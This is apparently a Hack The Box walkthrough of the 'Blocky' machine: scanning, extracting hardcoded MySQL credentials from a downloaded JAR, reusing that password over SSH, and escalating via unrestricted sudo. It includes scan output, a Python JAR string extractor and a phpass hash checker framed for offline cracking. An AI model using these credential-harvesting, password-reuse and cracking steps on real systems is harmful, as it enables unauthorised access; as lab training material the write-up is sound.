# Blocky HTB Walkthrough

<div align="left"><img src="/files/zZcabYrcCJNKp3cB1shE" alt="Blocky"></div>

**Overview**: open TCP ports FTP (21), SSH (22) and HTTP (80); TCP 25565 (Minecraft) is reported closed. Apache httpd 2.4.18; WordPress 4.8; OpenSSH carrying the Ubuntu package suffix 4ubuntu2.2 (Linux).

**Add blocky on the /etc/hosts file**

<div align="left"><img src="/files/jNxz8mesGmJ2NuwCFNid" alt="/etc/hosts"></div>

**Recon**

**Port scan - nmap**

```
nmap -T4 -A -p- 10.10.10.37
```

<div align="left"><img src="/files/NBY3Xr89dFYcmNRhVuk7" alt="nmap scan"></div>

Based on the OpenSSH and Apache package versions, the host is likely running Ubuntu 16.04 Xenial. TCP 25565, the default Minecraft server port, is also worth noting: nmap reports it closed rather than filtered, so the host answers on that port with a RST, meaning nothing is listening there at the moment.

Apache link: <https://packages.ubuntu.com/search?keywords=apache2>

OpenSSH link: <https://packages.ubuntu.com/search?keywords=openssh-server>

**Nikto Scan**

```
nikto -host 10.10.10.37
```

<div align="left"><img src="/files/lO9wC0Ondvc09ufwTVx3" alt="Nikto scan"></div>

**Website - TCP 80**

Visit the web page at http://10.10.10.37:80

<div align="left"><img src="/files/iqji88MvpdZj4YOJbcBA" alt=""></div>

<div align="left"><img src="/files/CMKeSwzLzsOKOMgqEhfv" alt=""></div>

The site is WordPress ("Proudly powered by WordPress" in the footer), and the posts describe the server and mention a wiki. The first post is authored by the user notch, which gives a valid username, and wp-login.php is the standard WordPress login page.

<div align="left"><img src="/files/VfCAAqvoj9BXGor528nr" alt=""></div>

<div align="left"><img src="/files/tQoKSD5u2uoGand9OXZq" alt=""></div>

<div align="left"><img src="/files/Bs1wbAm5XyY9LWCrBt97" alt=""></div>

The default login admin:admin does not work.

[**WPScan**](/try-harder-journey/recon-enumeration.md)

WPScan finds no plugins, but it confirms the notch user noted earlier and flags WordPress 4.8, XML-RPC enabled and directory listing on wp-content/uploads.

```
┌──(root💀kali)-[~/Desktop/htb/blocky]
└─# wpscan --url http://10.10.10.37 -e ap,t,tt,u
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.19
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Sun Nov 21 03:10:43 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.37/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.37/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://10.10.10.37/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured
images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Most Popular Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:02:32
<=============================================================================
=========> (400 / 400) 100.00% Time: 00:02:32
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen
| Location: http://10.10.10.37/wp-content/themes/twentyfifteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://10.10.10.37/wp-content/themes/twentyfifteen/style.css
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's
simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/, status: 500
|
| Version: 1.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.8'
[+] twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured
images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.3'
[+] twentysixteen
| Location: http://10.10.10.37/wp-content/themes/twentysixteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://10.10.10.37/wp-content/themes/twentysixteen/style.css
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the
horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.3'
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:04:42
<=============================================================================
=======> (2575 / 2575) 100.00% Time: 00:04:42
[i] No Timthumbs Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01
<=============================================================================
===========> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 21 03:18:20 2021
[+] Requests Done: 3050
[+] Cached Requests: 19
[+] Data Sent: 825.099 KB
[+] Data Received: 18.245 MB
[+] Memory used: 264.414 MB
[+] Elapsed time: 00:07:37
```

**Directory Brute Force (run** [**Gobuster**](/try-harder-journey/recon-enumeration.md#gobust) **with the PHP extension)**

```
┌──(root💀kali)-[~/Desktop/htb/blocky]
└─# gobuster dir -u blocky.htb -w /usr/share/wordlists/dirb/common.txt -x php -t 40
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/11/21 03:05:20 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 294]
/.htaccess.php        (Status: 403) [Size: 298]
/.hta                 (Status: 403) [Size: 289]
/.htpasswd            (Status: 403) [Size: 294]
/.htpasswd.php        (Status: 403) [Size: 298]
/.hta.php             (Status: 403) [Size: 293]
/index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]
/index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/server-status        (Status: 403) [Size: 298]
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/wp-login.php         (Status: 200) [Size: 2402]
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
/wp-blog-header.php   (Status: 200) [Size: 0]
/wp-config.php        (Status: 200) [Size: 0]
/wp-cron.php          (Status: 200) [Size: 0]
/wp-load.php          (Status: 200) [Size: 0]
/wp-links-opml.php    (Status: 200) [Size: 219]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-mail.php          (Status: 403) [Size: 3444]
/wp-settings.php      (Status: 500) [Size: 0]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://10.10.10.37/wp-login.php?action=register]
/xmlrpc.php           (Status: 405) [Size: 42]
/xmlrpc.php           (Status: 405) [Size: 42]
===============================================================
2021/11/21 03:06:30 Finished
===============================================================
```

From that list, I check out /wiki, /plugins and /phpmyadmin.

**Visit 10.10.10.37:80/wiki**

<div align="left"><img src="/files/oaOjYu3L06Ou9be0YE7e" alt=""></div>

**Visit 10.10.10.37:80/phpmyadmin**

The default login admin:admin does not work here either.

<div align="left"><img src="/files/NOOVAMRVUrkyWgKo9Jhs" alt=""></div>

**Visit 10.10.10.37:80/plugins**

The directory listing exposes two .jar files, BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar, which I download to my attacking machine.

<div align="left"><img src="/files/IO9iZAHIKNRAiGdyzoac" alt=""></div>

A JAR is a package file format typically used to aggregate many Java class files and associated metadata and resources into one file for distribution. JAR files are archive files that include a Java-specific manifest file. They are built on the ZIP format and typically have a .jar file extension.

**Shell as notch**

**Reverse Jars**

I use JD-GUI to decompile the JAR files. JD-GUI is a standalone graphical utility that displays Java source reconstructed from ".class" files; you can browse the reconstructed source for direct access to methods and fields.

***jd-gui:***

How to install: `sudo apt install jd-gui`

More details: <https://www.kali.org/tools/jd-gui/>

<div align="left"><img src="/files/w5vXAU98OeukXuLiAMfm" alt=""></div>

After installation I launch it with the command `jd-gui`, open each JAR and browse the classes. BlockyCore.class contains hardcoded MySQL credentials for the database root user:

<div align="left"><img src="/files/x1olmzkM9wFOA4KxeBXh" alt=""></div>

<div align="left"><img src="/files/lkDeQgCn4d2M1FAZchPD" alt=""></div>

```
public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    // remaining members of the decompiled class omitted
}
```
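JD-GUI shows these fields as source, but the literals themselves sit in the class file's constant pool, so a decompiler is not strictly required to find them. The following script is an added example, not code from this walkthrough or from the BlockyCore plugin: it walks a JAR, parses the constant pool of every .class entry and returns only the entries referenced by a CONSTANT_String, which is how it tells a literal such as the password apart from an identifier such as `sqlPass`. The JAR it scans is constructed in memory (a minimal, constant-pool-only class named BlockyCore.class carrying the three strings quoted above); feed `jar_string_literals` the bytes of the real BlockyCore.jar to run it against the box.

```python
"""Extract string literals from the .class files inside a JAR.

Added example (not code from this walkthrough or from the BlockyCore plugin):
a decompiler such as JD-GUI rebuilds readable source, but the literals it
shows live in each class file's constant pool as CONSTANT_String entries that
point at CONSTANT_Utf8 entries, so they can be recovered with a small parser
and no Java toolchain. The JAR scanned at the bottom is constructed in memory
to mirror the BlockyCore fields quoted above.
"""
import io
import struct
import zipfile

# Constant-pool tags (JVM spec section 4.4). Utf8 is variable-length; every
# other tag has a fixed payload size, listed here so entries we do not care
# about can be skipped correctly.
CP_UTF8, CP_LONG, CP_DOUBLE, CP_STRING = 1, 5, 6, 8
FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
              12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def parse_constant_pool(data: bytes) -> dict:
    """Return {index: (tag, payload)} for the constant pool of a class file."""
    magic, _minor, _major, count = struct.unpack(">IHHH", data[:10])
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    pool, pos, idx = {}, 10, 1
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == CP_UTF8:
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            text = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pool[idx] = (tag, text)
            pos += 2 + length
        elif tag in FIXED_SIZE:
            size = FIXED_SIZE[tag]
            pool[idx] = (tag, data[pos:pos + size])
            pos += size
        else:
            raise ValueError(f"unknown constant-pool tag {tag} at offset {pos - 1}")
        # Long and Double constants occupy two pool slots.
        idx += 2 if tag in (CP_LONG, CP_DOUBLE) else 1
    return pool


def string_literals(class_bytes: bytes) -> list:
    """Only Utf8 entries referenced by a CONSTANT_String are real literals.
    Field names such as sqlPass are Utf8 entries too, but no CONSTANT_String
    points at them, which is what separates a password from the name of the
    field holding it."""
    pool = parse_constant_pool(class_bytes)
    literals = []
    for tag, payload in pool.values():
        if tag == CP_STRING:
            (ref,) = struct.unpack(">H", payload)
            literals.append(pool[ref][1])
    return literals


def jar_string_literals(jar_bytes: bytes) -> dict:
    """Map every .class entry in a JAR (a zip file) to its string literals."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                found[name] = string_literals(jar.read(name))
    return found


def build_sample_class(identifiers: list, literals: list) -> bytes:
    """Constructed class file containing only a constant pool (enough for the
    parser above; a JVM would reject it). Identifiers become plain Utf8
    entries, literals become Utf8 entries plus a CONSTANT_String each."""
    entries = []
    for text in identifiers + literals:
        enc = text.encode("utf-8")
        entries.append(bytes([CP_UTF8]) + struct.pack(">H", len(enc)) + enc)
    first_literal = len(identifiers) + 1      # pool indices start at 1
    for i in range(len(literals)):
        entries.append(bytes([CP_STRING]) + struct.pack(">H", first_literal + i))
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, len(entries) + 1)
    return header + b"".join(entries)


def build_sample_jar() -> bytes:
    """Constructed JAR mirroring the BlockyCore fields quoted on this page."""
    cls = build_sample_class(
        identifiers=["sqlHost", "sqlUser", "sqlPass", "Ljava/lang/String;"],
        literals=["localhost", "root", "8YsqfCTnvxAUeduzjNSXe22"])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("BlockyCore.class", cls)
    return buf.getvalue()


if __name__ == "__main__":
    for entry, strings in jar_string_literals(build_sample_jar()).items():
        print(entry, strings)
```

On the downloaded file, `jar_string_literals(open("BlockyCore.jar", "rb").read())` returns the same three strings. If a JDK is available, `javap -v BlockyCore.class` dumps the same constant pool, which is a quick way to confirm the parser's output.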

Logging in to phpMyAdmin with root:8YsqfCTnvxAUeduzjNSXe22 works.

<div align="left"><img src="/files/qzf0Ldv1JLGgcoH67DDP" alt=""></div>

<div align="left"><img src="/files/Ag5KaEJprNUKerQwFJ3v" alt=""></div>

<div align="left"><img src="/files/kgybe7av9AeIzqMpk9Sa" alt=""></div>

I look at wp\_users and find the notch row, including its user_pass hash. (With the database root account, the hash could also simply be overwritten: WordPress accepts a plain MD5 value in user_pass and re-hashes it at the next login. That is not needed here.)

```
SELECT * FROM `wp_users`
```

<div align="left"><img src="/files/WrT8zH79uPV9CoI2txTp" alt=""></div>

I use hash-identifier to work out what kind of hash "BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/" is. hash-identifier guesses the algorithm behind a digest from its length, prefix and character set; hashes are one-way, not encryption, so the tool only classifies them, it does not reverse them. More information: <https://www.kali.org/tools/hash-identifier/>

How to install:

```
 apt install hash-identifier
```

I launch hash-identifier with the following command:

```
hash-identifier
```

<div align="left"><img src="/files/ZXFnOYZDv6aRIkXVNiFs" alt=""></div>

<div align="left"><img src="/files/4RcJ9T45Lss36o4l2QUg" alt=""></div>

hash-identifier reports it as MD5(Wordpress). That label means the phpass "portable" format WordPress uses for user_pass: a `$P$` prefix, one character giving log2 of the MD5 iteration count (`B` is 8192 rounds, the WordPress default), eight salt characters, then 22 characters of encoded digest. The 31-character value quoted above appears to be that hash with its `$P$` prefix dropped. Being salted and iterated MD5 it can be attacked with a wordlist (hashcat mode 400, or `john --format=phpass`), but that is not needed here: the MySQL password recovered from the JAR is worth trying elsewhere first.
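To make the format concrete, the script below is an added example, not part of the walkthrough: it re-implements phpass's `crypt_private`/`CheckPassword` logic in Python so a stored WordPress hash can be decoded and a candidate password verified offline. The hash it decodes is the value quoted above with the `$P$` prefix restored, which is an assumption on my part; the password it hashes and verifies is made up.

```python
"""phpass portable hashes, the format hash-identifier labels "MD5(Wordpress)".

Added example, not from the original walkthrough. WordPress stores user_pass
as "$P$" + one itoa64 character encoding log2 of the MD5 iteration count
+ 8 salt characters + 22 characters of encoded digest. The functions below
follow the PHP PasswordHash::crypt_private / CheckPassword logic so a stored
value can be decoded and a candidate password checked offline.
"""
import hashlib
import hmac
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def encode64(raw: bytes, count: int) -> str:
    """phpass's own base64 variant (different alphabet and bit order from
    RFC 4648); 16 digest bytes become 22 characters, 6 salt bytes become 8."""
    out, i = "", 0
    while i < count:
        value = raw[i]
        i += 1
        out += ITOA64[value & 0x3F]
        if i < count:
            value |= raw[i] << 8
        out += ITOA64[(value >> 6) & 0x3F]
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out += ITOA64[(value >> 12) & 0x3F]
        if i >= count:
            break
        i += 1
        out += ITOA64[(value >> 18) & 0x3F]
    return out


def describe(stored: str) -> tuple:
    """Decode a phpass hash into (iterations, salt, encoded digest)."""
    if stored[:3] not in ("$P$", "$H$") or len(stored) != 34:
        raise ValueError("not a phpass portable hash")
    return 1 << ITOA64.index(stored[3]), stored[4:12], stored[12:]


def crypt_private(password: str, setting: str) -> str:
    """Hash `password` under the parameters in `setting`; '*' marks a
    malformed setting, as in the PHP original."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        return "*"
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        return "*"
    pw = password.encode("utf-8")
    digest = hashlib.md5(setting[4:12].encode() + pw).digest()
    for _ in range(1 << count_log2):          # salted, iterated MD5
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + encode64(digest, 16)


def check_password(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    computed = crypt_private(password, stored)
    return computed != "*" and hmac.compare_digest(computed, stored)


def hash_password(password: str, count_log2: int = 13) -> str:
    """WordPress default is count_log2 = 13, i.e. '$P$B' and 8192 rounds."""
    setting = "$P$" + ITOA64[count_log2] + encode64(os.urandom(6), 6)
    return crypt_private(password, setting)


# The value quoted above with the "$P$" prefix restored (an assumption: that
# prefix is what makes hash-identifier report MD5(Wordpress)).
NOTCH_HASH = "$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/"

if __name__ == "__main__":
    print(describe(NOTCH_HASH))               # (8192, 'iVoTj899', 'ItS1EZnMhqeqVbrZI4Oq0/')
    demo = hash_password("made-up-password")  # constructed, not notch's real password
    print(demo, check_password("made-up-password", demo))
```

`describe` is what hash-identifier's label hides: the iteration count and salt are in the clear, and only the last 22 characters are the digest. `check_password` is the same test WordPress performs at login, so pointing a wordlist loop at it against a real `$P$` value is exactly what hashcat mode 400 does, only much slower.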

**Exploitation (SSH - Port 22)**

With a WordPress username (notch), the database user root and one password in hand, the next step is to try that password over SSH in case it was reused.

The SSH protocol (also referred to as Secure Shell) is a method for secure remote login from one computer to another. It provides several alternative options for strong authentication, and it protects the communications security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).&#x20;

More details: <https://www.ssh.com/ssh/protocol/>

So far there are two candidate usernames (notch and root) and a single password, 8YsqfCTnvxAUeduzjNSXe22. I try it against the notch account over SSH:

```
sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@10.10.10.37
# or interactively, typing the password at the prompt:
ssh notch@10.10.10.37
```

**User Notch**

I try to log in as notch over SSH but get the error "ssh: connect to host 10.10.10.37 port 22: No route to host". I google this error and find a fix here: <https://www.tecmint.com/fix-no-route-to-host-ssh-error-in-linux/>

<div align="left"><img src="/files/ygrzD3ogjvhHTZC4yjSt" alt=""></div>

<div align="left"><img src="/files/qgL0ZYPTEZj31ADBfrtZ" alt=""></div>

```
# firewalld-based hosts
firewall-cmd --permanent --add-port=22/tcp
firewall-cmd --reload

# ufw-based hosts (Debian/Ubuntu/Kali)
sudo ufw allow 22/tcp
sudo ufw reload
```

I choose ufw and then get another error, "zsh: command not found: ufw", so I have to install it first with "apt install -y ufw". Details: <https://www.hiroom2.com/2017/07/20/kalilinux-2017-1-ufw-en>

A caveat for anyone hitting the same message: a ufw or firewall-cmd rule on the attacking machine only governs connections coming in to it, not the outbound SSH client connection. "No route to host" on an outbound connect means the kernel has no usable route to 10.10.10.37, which on HTB usually means the VPN tunnel is down or missing its route, so `ip route get 10.10.10.37` and the VPN state are the first things to check.

<div align="left"><img src="/files/TbytIwzCDL8NsBtyoaRR" alt=""></div>

<div align="left"><img src="/files/U7Ydy79OOzyzKvL0thBS" alt=""></div>

<div align="left"><img src="/files/2Xh8ikUJgWHm9vu06gxe" alt=""></div>

<div align="left"><img src="/files/XheogxVTdiEyETJd7iDs" alt=""></div>

**Login with sshpass**

sshpass is a utility designed for running ssh using the mode referred to as “keyboard-interactive” password authentication, but in non-interactive mode. ssh uses direct TTY access to make sure that the password is indeed issued by an interactive keyboard user. Sshpass runs ssh in a dedicated tty, fooling it into thinking it is getting the password from an interactive user. More information link:

<https://www.cyberciti.biz/faq/noninteractive-shell-script-ssh-password-provider/>

How to install sshpass on Kali:

```
apt-get install sshpass
```

<div align="left"><img src="/files/7KYJPdtqNbfKoXobkbHQ" alt=""></div>

<div align="left"><img src="/files/zxsDhE3QCmiJAZdMxPlI" alt=""></div>

**Privilege Escalation**

**Notch ---> Root**

I run "sudo -l" to see what notch may run, then "sudo su -" to become root. sudo authenticates with notch's own password, the same 8YsqfCTnvxAUeduzjNSXe22 used for SSH, so no separate root password is needed.

Sudo is a program for Unix-like operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for "superuser do", as older versions of sudo were designed to run commands only as the superuser.

More information: <https://en.wikipedia.org/wiki/Sudo>

<div align="left"><img src="/files/hNEFeq6ouPvXGrvVjow6" alt=""></div>

sudo -l shows that notch may run any command as any user via sudo, so "sudo su -" drops straight into a root shell.

<div align="left"><img src="/files/gZbHyZPHNN1Kxz2BLkCq" alt=""></div>

Thanks for reading. This is my 41st pwned machine on Hack The Box. I will try harder to go beyond OSCP, so that I can pass the OSCP successfully.


